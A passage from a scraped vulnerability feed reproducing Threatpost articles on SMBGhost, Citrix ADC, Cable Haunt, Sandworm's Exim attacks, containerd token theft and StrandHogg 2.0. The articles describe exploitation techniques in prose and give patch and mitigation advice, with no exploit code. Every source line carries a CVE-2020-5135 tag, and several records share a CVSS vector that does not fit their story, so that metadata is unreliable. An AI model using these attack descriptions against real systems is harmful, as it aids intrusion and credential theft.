"2019-11-21T19:15:17", "id": "THREATPOST:597800CEAF4F4832B357C491661792B5", "href": "https://threatpost.com/microsoft-outlook-android-bug-xss/150528/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2020-10-14T22:27:36", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch on Thursday to fix a wormable SMBv3 bug that leaked earlier this week. The patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server, versions 1903 and 1909, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug is in version 3.1.1 of the SMB file-sharing protocol. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. 
This played out with SMBv1 back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos, meanwhile, warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. 
We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said it likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomizes the addresses at which the kernel and its drivers are loaded at each boot, so an exploit cannot rely on fixed kernel addresses: a wrong guess crashes the machine instead of yielding code execution, and a reliable remote exploit typically needs a separate information leak to learn the layout first.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability has been exploited in the wild, Microsoft said in the advisory. 
However, Melick said to proceed with caution.

“There are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?” Melick noted – the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers’ initial fears.

In lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.

To protect clients from outside attacks, it’s necessary to block TCP port 445 at the enterprise perimeter firewall.

“TCP port 445 is used to initiate a connection with the affected component,” Microsoft noted. “Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.”

However, systems could still be vulnerable to attacks from within the enterprise perimeter – so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way.
Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.

_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_

_Source: Threatpost, “Wormable, Unpatched Microsoft Bug Threatens Corporate LANs,” published 2020-03-11. Tagged CVEs: CVE-2020-0796, CVE-2020-5135. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Record THREATPOST:0EAD358006302B8EB3637C22334E13DC, <https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>_

---

Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.

Several versions of the products still remain unpatched – but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan.
31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan. 24 (Friday of this week).

Also, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 — a day earlier than it had expected to.

The versions that Citrix expects to patch on Jan. 24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).

When it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until “late January.”

However, in the weeks following disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitation](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), targeting the vulnerable Citrix products.

> CVE-2019-19781 mass scanning activity from these hosts is still ongoing.
> <https://t.co/pK4Qus1eAo>
> 
> — Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)

In one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined “NOTROBIN.”

Researchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.

“Upon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,” researchers said.

With patches now available or soon to be rolled out, security experts urge customers to update as soon as possible.

“CISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,” according to a Monday CISA alert on the patches. “The fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>).
Until the appropriate update is accessible, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781.”

_Source: Threatpost, “Citrix Accelerates Patch Rollout For Critical RCE Flaw,” published 2020-01-21. Tagged CVEs: CVE-2019-19781, CVE-2020-5135. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Record THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B, <https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>_

---

UPDATED

Multiple cable modems used by ISPs to provide broadband into homes have a critical vulnerability in their underlying reference architecture that would allow an attacker full remote control of the device. The footprint for the affected devices numbers in the hundreds of millions worldwide.

Dubbed “Cable Haunt” by researchers at Lyrebirds, the bug (CVE-2019-19494) is found in cable modems across multiple vendors, including Arris, COMPAL, Netgear, Sagemcom, Technicolor and others.
It originated in reference software written by Broadcom, researchers said, which has been copied by different cable-modem manufacturers and used in the devices’ firmware. The bug is essentially a buffer overflow, which could enable a remote attacker to execute arbitrary code at the kernel level via JavaScript run in a victim’s browser, according to the [CVE writeup](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19494>).

More specifically, “the cable modems are vulnerable to a DNS rebind attack followed by overflowing the registers and executing malicious functionality,” explained the researchers, in a [technical paper](<https://cablehaunt.com/>) on the attack. “The exploit is possible due to lack of protection against DNS rebind attacks, default credentials and a programming error in the spectrum analyzer.”

Lyrebirds researchers said that 200 million modems are potentially affected in Europe alone; they focused their research on European ISPs, many of which are already rolling out updates to fix the flaw. However, many of the same modems are used in North America, so Cable Haunt isn’t restricted by geography. Users can check to see if they’re affected using a [test script](<https://github.com/Lyrebirds/cable-haunt-vulnerability-test>) that the researchers released in tandem with the bug details.

As far as U.S.
ISPs, “we are rapidly testing all our in-home broadband equipment, determining any vulnerability and the best steps to mitigate, as needed,” a Cox spokesperson told Threatpost.

A Charter spokesperson meanwhile told us that Charter is “currently working with each of our vendors to determine if their equipment is vulnerable and when we could expect to see a firmware upgrade.”

Comcast, for its part, did not return a request for comment.

## The Attack

In a [proof-of-concept (PoC) exploit](<https://github.com/Lyrebirds/sagemcom-fast-3890-exploit>), researchers were able to demonstrate a two-step attack: First, they compromised the spectrum analyzer component on board a modem, which resulted in local access. The spectrum analyzer uses a websocket for communication with the graphical frontend displayed in a browser, and a server must verify the relevant request parameters added by the browser. However, “because these parameters are never inspected by the cable modem, the websocket will accept requests made by JavaScript running in the browser regardless of origin, thereby allowing attackers to reach the endpoint,” researchers explained.

In the second step, they show that a DNS rebind attack can be used to gain remote access to the compromised spectrum analyzer. [DNS rebinding](<https://www.tripwire.com/state-of-security/vert/practical-attacks-dns-rebinding/>) is a technique that turns a victim’s browser into a proxy for attacking private networks.

“Without this DNS rebind attack, the spectrum analyzer would only be exploitable on the local network,” they wrote.

Through malicious communication with the endpoint, a buffer overflow can be exploited to gain control of the modem.

“The websocket requests are given as JSON,” the paper explained.
“The parser which interprets this JSON request will copy the input parameters to a buffer, regardless of length, allowing values on the stack to be overwritten. Among these values are saved registers, such as the program counter and return address. With a carefully crafted message the modem can be manipulated to execute arbitrary code specified by a remote attacker.”

If successfully exploited, the vulnerabilities can give attackers “full remote control over the entire unit, and all the traffic that flows through it, while being invisible for both the user and ISP,” the researchers explained, adding that attackers could intercept private messages, redirect traffic, add the modems to botnets, replace their firmware and more. They could also direct the modem to ignore remote system updates, which could complicate any patching process.

_**This post was updated at 11:30 a.m. ET on Jan. 14, 2020 to include statements from the top U.S. cable companies.**_
_Source: Threatpost, “'Cable Haunt' Bug Plagues Millions of Home Modems,” published 2020-01-13. Tagged CVEs: CVE-2019-19494, CVE-2020-5135. CVSS 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). Record THREATPOST:E54A6B6E04C21B79F588B156DC5704F8, <https://threatpost.com/cable-haunt-remote-code-execution/151756/>_

---

About one in five of the 80,000 companies affected by a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway are still at risk from a trivial attack on their internal operations.

If exploited, the flaw could allow unauthenticated attackers to gain remote access to a company’s local network and carry out arbitrary code-execution. Researchers told Threatpost that other attacks are also possible, including denial-of-service (DoS) campaigns, data theft, lateral infiltration to other parts of the corporate infrastructure, and phishing.

According to an assessment from Positive Technologies, which disclosed the software vulnerability in December (tracked as [CVE-2019-19781](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>)), 19 percent of vulnerable organizations in 158 countries have yet to patch. The U.S.
originally accounted for 38 percent of all vulnerable organizations; about 21 percent of those are still running vulnerable instances of the products as of this week, PT said.

The Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively.

“Patching this bug should be an urgent priority for all remaining companies affected,” said Mikhail Klyuchnikov, an expert at PT who discovered the flaw, speaking to Threatpost. “The critical vulnerability allows attackers to obtain direct access to the company’s local network from the internet. This attack does not require access to any accounts, and therefore can be performed by any external attacker.”

He added, “The flaw is really easy to exploit. It’s also very reliable.”

Since Citrix is mainly used for giving remote access to applications in companies’ internal networks, Klyuchnikov told Threatpost that a compromise could easily be used as a foothold to move laterally across a victim organization.

“The critical information about applications accessible by Citrix can be leaked,” he explained. “That could possibly include information (and possibly credentials) about internal web applications, corporate applications, remote desktops and other applications available through the Citrix Gateway.”

Attackers also could gain the ability to read configuration files, he said; these contain sensitive information like user credentials, yet more information about the internal network and credentials for internal services (LDAP, RADIUS and so on).

“Depending on system settings, attackers can get administrative credentials for the Citrix Gateway, credentials (login, password, etc.)
of company employees and credentials of other services used in Citrix Gateway [from the configuration files],” he said.

Adding insult to injury, various other kinds of attacks are possible as well.

“[An attacker] can conduct DoS attacks against Citrix Gateway, just deleting its critical files,” the researcher explained to Threatpost. “It can lead to unavailability of the login page of Citrix application. Thus, no one (e.g. company employees) can get access into internal network using Citrix gateway. In other words, the Citrix gateway application will cease to do its main task for which it was installed.”

It’s also possible to conduct phishing attacks. For example, a hacker can change the login page so that the entered username and password are obtained by the attacker as clear text.

And then there’s the remote code-execution danger: “An attacker can use a compromised application as part of a botnet or for cryptocurrency mining. And of course, it can place malicious files in this application,” Klyuchnikov noted.

In-the-wild attacks could be imminent: On January 8, a researcher [released an exploit](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) that allows a potential attacker to perform automated attacks. Others followed.

https://twitter.com/GossiTheDog/status/1214892555306971138

Citrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>); however, Qualys researchers last month said that the mitigation steps offered by the vendor suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.

According to PT, the countries with the greatest numbers of vulnerable companies are led by Brazil (43 percent of all companies where the vulnerability was originally detected), China (39 percent), Russia (35 percent), France (34 percent), Italy (33 percent) and Spain (25 percent).
The USA, Great Britain, and Australia each stand at 21 percent of companies still using vulnerable devices without any protection measures.

Last month, Citrix [issued patches](<https://support.citrix.com/article/CTX267027>) for several product versions to fix the issue, [ahead of schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).

“Considering how long this vulnerability has been around (since the first vulnerable version of the software was released in 2014), detecting potential exploitation of this vulnerability (and, therefore, infrastructure compromise) retrospectively becomes just as important [as patching],” Klyuchnikov said.

He added, “I think it’s easy to apply the patch, as there is already a regular update for the hardware that fixes the vulnerability. Nothing should get in the way, as there is a full update from Citrix.”
_Source: Threatpost, “Critical Citrix RCE Flaw Still Threatens 1,000s of Corporate LANs,” published 2020-02-07. Tagged CVEs: CVE-2019-19781, CVE-2020-5135. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Record THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA, <https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>_

---

The Russia-linked APT group Sandworm has been spotted exploiting a vulnerability in the internet’s top email server software, according to the National Security Agency (NSA).

The bug exists in the Exim Mail Transfer Agent (MTA) software, an open-source offering used on Linux and Unix-like systems. It essentially receives, routes and delivers email messages from local users and remote hosts. Exim is the default MTA included on some Linux distros like Debian and Red Hat, and Exim-based mail servers in general run almost 57 percent of the internet’s email servers, according to [a survey last year](<http://www.securityspace.com/s_survey/data/man.201905/mxsurvey.html>).

The bug ([CVE-2019-10149](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>)) would allow an unauthenticated remote attacker to execute commands with root privileges on an Exim mail server, allowing the attacker to install programs, modify data and create new accounts. It’s also wormable; a previous campaign spread cryptominers automatically from system to system using a port sniffer.
The bug was patched last June.

The NSA this week released a cybersecurity advisory on new exploit activity from Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, a.k.a. Sandworm, a.k.a. BlackEnergy. The APT [has been linked to](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) the Industroyer attack on the Ukrainian power grid as well as the [infamous NotPetya attacks](<https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/>). According to Kaspersky, the group is part of a nexus of related APTs that also includes a [recently discovered group called Zebrocy](<https://threatpost.com/zebrocy-russian-apt/145328/>).

The flaw can be exploited using a specially crafted email containing a modified “MAIL FROM” field in a Simple Mail Transfer Protocol (SMTP) message. The APT has been exploiting unpatched Exim servers in this way since at least August, according to [the NSA’s advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>).

Once Sandworm compromises a target Exim server, it subsequently downloads and executes a shell script from a Sandworm-controlled domain to establish a persistent backdoor that can be used for reconnaissance, spying on mail messages, lateral movement and additional malware implantation.

“This script would attempt to do the following on the victim machine: Add privileged users; disable network security settings; update SSH configurations to enable additional remote access; and execute an additional script to enable follow-on exploitation,” according to the NSA, which didn’t disclose any details as to the victimology of the latest offensives.

Exim admins should update their MTAs to [version 4.93 or newer](<https://exim.org/mirrors.html>) to mitigate the issue, the NSA noted.

“This emphasizes the need for a good vulnerability management plan,” Lamar Bailey, senior director of security research at Tripwire, said via email. “CVE-2019-10149 has been out almost a year now and has a CVSS score above 9, making it a critical vulnerability. High-scoring vulnerabilities on a production email server are high risk and there should be plans in place to remediate them ASAP.”
_Source: Threatpost, “NSA Warns of Sandworm Backdoor Attacks on Mail Servers,” published 2020-05-29. Tagged CVEs: CVE-2019-10149, CVE-2020-5135. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Record THREATPOST:130EDA07603C228BE562B445904A297A, <https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/>_

---

The release of a fully functional proof-of-concept (PoC) exploit for a critical, wormable remote code-execution (RCE) vulnerability in Windows could spark a wave of cyberattacks, the feds have warned.

Microsoft patched the bug tracked as [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) back in March; also known as SMBGhost or CoronaBlue, it affects Windows 10 and Windows Server 2019. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol – the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/wannacry-infested-laptop-art-auction/144992/>) in 2017.
SMB is a file-sharing system that allows multiple clients to access shared folders, and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection.

In this case, the bug is an integer overflow vulnerability in the SMBv3.1.1 message decompression routine of the kernel driver srv2.sys.

Microsoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).

“Although Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber-actors are targeting unpatched systems with the new PoC, according to recent open-source reports,” [warned](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>) the Cybersecurity and Infrastructure Security Agency (CISA) on Friday. “CISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.”

The author behind the PoC, who goes by “Chompie,” announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) last week on Twitter. Several replies followed the original post, confirming that the exploit does in fact work.

> This was a pain 😂. But I was able to achieve RCE with CVE 2020-0796 [#SMBGhost](<https://twitter.com/hashtag/SMBGhost?src=hash&ref_src=twsrc%5Etfw>).
> [pic.twitter.com/mvQ0YQt9GT](<https://t.co/mvQ0YQt9GT>)
> 
> — chompie (@chompie1337) [June 1, 2020](<https://twitter.com/chompie1337/status/1267327689213517825?ref_src=twsrc%5Etfw>)

The PoC is notable because it achieves RCE – previous attempts to exploit SMBGhost have resulted only in denial of service or local privilege escalation, according to security analysts.

“While there have already been many public reports and PoCs of LPE (Local Privilege Escalation), none of them have shown that RCE is actually possible so far,” said researchers at Ricerca Security, who did [a full writeup](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) of Chompie’s exploit. “This is probably because remote kernel exploitation is very different from local exploitation in that an attacker can’t utilize useful OS functions such as creating userland processes, referring to PEB, and issuing system calls.”

Windows 10 also has specific mitigations that make RCE a much more difficult thing to achieve, they noted.

“In the latest version of Windows 10, RCE became extremely challenging owing to almost flawless address randomization,” the researchers explained. “In a nutshell, we defeat this mitigation by abusing MDL (memory descriptor list)s, structs frequently used in kernel drivers for Direct Memory Access. By forging this struct, we make it possible to read from ‘physical’ memory. As basically no exception will occur when reading physical memory locations, we obtain a stable read primitive.”

To protect networks, administrators should apply the updates; Microsoft also has offered [workaround guidance](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for those that can’t patch.
For instance, on the server side, companies can disable SMBv3 compression to block unauthenticated attackers, using a PowerShell command: `Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force`. No reboot is necessary.

To protect unpatched SMB clients, Microsoft [noted that it’s possible](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to block traffic via firewalls and other methods. Companies can for instance simply block TCP port 445 at the enterprise perimeter firewall (though systems could still be vulnerable to attacks from within their enterprise perimeter).

_Source: Threatpost, “SMBGhost RCE Exploit Threatens Corporate Networks,” published 2020-06-08. Tagged CVEs: CVE-2020-0796, CVE-2020-5135. CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Record THREATPOST:A7995232CE91305C94B84BB400B1EA34, <https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>_

---

A security vulnerability can be exploited to coerce the containerd cloud platform into exposing the host’s registry or users’ cloud-account credentials.

Containerd [bills itself](<https://containerd.io/>) as a runtime tool that “manages the complete container lifecycle of its host system, from image transfer and storage to container execution and supervision to low-level storage to network attachments and beyond.” As such, it offers deep visibility into a user’s cloud environment, across multiple vendors.

The bug (CVE-2020-15157) is located in the container image-pulling process, according to Gal Singer, researcher at Aqua.
Adversaries can exploit this vulnerability by building dedicated container images designed to steal the host\u2019s token, then using the token to take over a cloud project, he explained.\n\n\u201cA container image is a combination of a manifest file and some individual layer files,\u201d he wrote in a [recent post](<https://blog.aquasec.com/cve-2020-15157-containerd-container-vulnerability>). \u201cThe manifest file [in Image V2 Schema 2 format]\u2026can contain a \u2018foreign layer\u2019 which is pulled from a remote registry. When using containerd, if the remote registry responds with an HTTP 401 status code, along with specific HTTP headers, the host will send an authentication token that can be stolen.\u201d\n\nHe added, \u201cthe manifest supports an optional field for an external URL from which content may be fetched, and it can be any registry or domain.\u201d\n\nThe attackers can thus exploit the problem by crafting a malicious image in a remote registry, and then convincing the user to access it through containerd (this can be done through email and other social-engineering avenues), according to the [National Vulnerability Database writeup](<https://nvd.nist.gov/vuln/detail/CVE-2020-15157>).\n\n\u201cIf an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control, and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image,\u201d according to the bug advisory. \u201cIn some cases, this may be the user\u2019s username and password for the registry. 
In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account.\u201d\n\n## **Non-Trivial Exploitation**\n\nResearcher Brad Geesaman at Darkbit, who did original research into the vulnerability (which he calls \u201cContainerDrip\u201d), put together a proof-of-concept (PoC) exploit for a related attack vector.\n\nOne of the hurdles for exploitation is the fact that containerd clients that pull images may be configured to authenticate to a remote registry in order to fetch private images, which would prevent it from accessing the malicious content. Instead, an attacker would need to place the tainted image into a remote registry that the user already authenticates to.\n\n\u201cThe question became: \u2018How do I get them to send their credentials to me [for remote-registry authentication]?'\u201d he said in [a posting](<https://darkbit.io/blog/cve-2020-15157-containerdrip>) earlier this month. \u201cAs it turns out, all you have to do is ask the right question.\u201d\n\nThe Google Kubernetes Engine (GKE) is a managed environment for running containerized applications, which can be integrated with containerd. When GKE clusters running COS_CONTAINERD and GKE 1.16 or below are given a deployment to run, a Basic Auth header shows up, which when base64 decoded, turns out to be the authentication token for the underlying Google Compute Engine, used to create virtual machines. This token is attached to the GKE cluster/nodepool.\n\n\u201cBy default in GKE, the [Google Cloud Platform] service account attached to the nodepool is the default compute service account and it is granted Project Editor,\u201d explained Geesaman.\n\nThat said, also by default, a function called GKE OAuth Scopes \u201cscopes down\u201d the available permissions of that token. 
Geesaman also found a workaround for that.\n\n\u201cIf the defaults were modified when creating the cluster to grant the [\u201cany\u201d] scope to the nodepool, this token would have no OAuth scope restrictions and would grant the full set of Project Editor IAM permissions in that GCP project,\u201d he explained.\n\nAnd from there, attackers can escalate privileges to \u201cProject Owner\u201d using a known attack vector [demonstrated at](<https://www.youtube.com/watch?v=Z-JFVJZ-HDA>) DEF CON 2020.\n\nHe added that the GKE path is one of many possible.\n\ncontainerd [patched](<https://github.com/containerd/containerd/releases/tag/v1.2.14>) the bug, which is listed as medium in severity, in version 1.2.4; containerd 1.3.x is not vulnerable.\n\nCloud security continues to be a challenge for organizations. Researchers earlier in October [disclosed two flaws](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in Microsoft\u2019s Azure web hosting application service, App Services, which if exploited could enable an attacker to take over administrative servers. Over the summer, malware like the Doki backdoor was [found to be infesting](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) Docker containers.\n\nIn April, a simple Docker container honeypot was [used in a lab test](<https://threatpost.com/poorly-secured-docker-image-rapid-attack/154874/>) to see just how quickly cybercriminals will move to compromise vulnerable cloud infrastructure. 
It was quickly attacked by four different criminal campaigns over the span of 24 hours.\n", "cvss3": {}, "published": "2020-10-26T17:12:13", "type": "threatpost", "title": "Containerd Bug Exposes Cloud Account Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15157", "CVE-2020-5135"], "modified": "2020-10-26T17:12:13", "id": "THREATPOST:39625C47309704502299C3CF93814CFA", "href": "https://threatpost.com/containerd-bug-cloud-account-credentials/160546/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:43", "description": "A critical privilege-escalation vulnerability affecting Android devices has been found that allows attackers to hijack any app on an infected phone \u2013 potentially exposing private SMS messages and photos, login credentials, GPS movements, phone conversations and more.\n\nThe bug is dubbed the \u201cStrandHogg 2.0\u201d vulnerability (CVE-2020-0096) by the Promon researchers who found it, due to its similarity to the [original StrandHogg bug](<https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/>) discovered last year. Like the original, a malicious app installed on a device can hide behind legitimate apps. When a normal app icon is clicked, a malicious overlay is instead executed, which can harvest login credentials for the legitimate app.\n\nHowever, Version 2.0 allows for a wider range of attacks. The main difference with the new bug is that exploits are carried out through reflection, \u201callowing malicious apps to freely assume the identity of legitimate apps while also remaining completely hidden,\u201d researchers explained, in [a white paper](<https://promon.co/strandhogg-2-0/>) published on Tuesday. 
The original StrandHogg allowed attacks via the TaskAffinity Android control setting.\n\n\u201cStrandHogg 2.0\u2026has learned how to, with the correct per-app tailored assets, dynamically attack nearly any app on a given device simultaneously at the touch of a button, unlike StrandHogg which can only attack apps one at a time,\u201d according to the research.\n\nAttackers would first inject the original launcher activity of the apps they are targeting with their own attack activity. The task will appear to be the original task belonging to the app; however, the attack activity that has been placed into the task is what the user will actually see when the task is activated.\n\n\u201cAs a result, the next time the app is invoked, for instance, by a user clicking its app icon, the Android OS will evaluate the existing tasks and find the task we created,\u201d according to the white paper. \u201cBecause it looks genuine to the app, it will bring the task we created to the foreground and with it our attack will now be activated.\u201d\n\nThe Promon researchers have published a proof-of-concept video of how an exploit would work:\n\n\u201cMobile apps practically have a target painted on their back. Promon\u2019s recent malware vulnerability discovery dubbed \u2018StrandHogg 2.0\u2019 is the latest example of what dangerous 